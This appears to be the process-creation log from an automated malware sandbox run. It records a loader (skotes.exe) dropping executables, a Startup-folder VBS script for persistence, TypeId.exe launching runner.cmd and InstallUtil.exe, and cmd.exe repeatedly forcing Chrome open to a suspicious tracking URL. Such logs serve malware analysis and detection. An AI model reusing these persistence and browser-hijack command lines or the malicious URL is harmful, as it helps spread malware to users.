Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,4294371869201058628,10846258970923498441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1876,i,8933970381661588511,1818581820197100254,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2004,i,13216114064629241855,13841717341427345233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,10389912691377095377,17096823969531010843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1888,i,4051071628513783081,16709262364601523388,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1964,i,15873263108661751163,18258898578722931507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,6147241270899392023,4453104157303319847,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1952,i,7341651988098688960,14787193282515593003,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe "C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2000,i,4938578974072308078,5824721121082526347,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1964,i,17019434423062336247,7506196191360105004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1980,i,4588146245341811016,13786467013321908988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1032 --field-trial-handle=1972,i,17637373075668188386,10376262394289011974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1472,i,3006803207684737282,13482510552465898190,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,7370493582738384417,3969430867986938643,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1952,i,8612513622396932950,13356658119274073296,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2004,i,12612036452984945250,3418118297406578597,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe "C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1988,i,16593288603214495399,11730275540552871039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1984,i,14226800829201652385,10276475017906767513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,10262160878012687441,15301380062293127654,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1968,i,3968838028028287844,15257303702526662038,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,13595040883661267341,5298112090488421856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2000,i,2165972809307344740,441943955686262932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1976,i,11014613956716725374,17879268145922355351,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1932,i,3839464556416060848,13026013853573635163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe "C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1992,i,7238726655923870739,5759593871076519028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1988,i,9243568103408200411,14083164291610540486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,15419181765585057394,6670311027553153785,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2024,i,14402791647519130237,17028031831812843495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2028,i,14704702612634137022,13283822498721106839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1172 --field-trial-handle=2012,i,5999604552990070426,13015335531134966904,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,13800168806641850337,1252832294211567749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe "C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1984,i,6342465718296439963,7063653370630127656,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1996,i,14624050743364290986,7834764246845110021,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1996,i,2440065999085773376,4668946962335946973,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2016,i,979502028839624058,13434839107830149959,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,8220830113635767741,8511822262946293777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1968,i,17173762750527162096,5079444058244670986,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
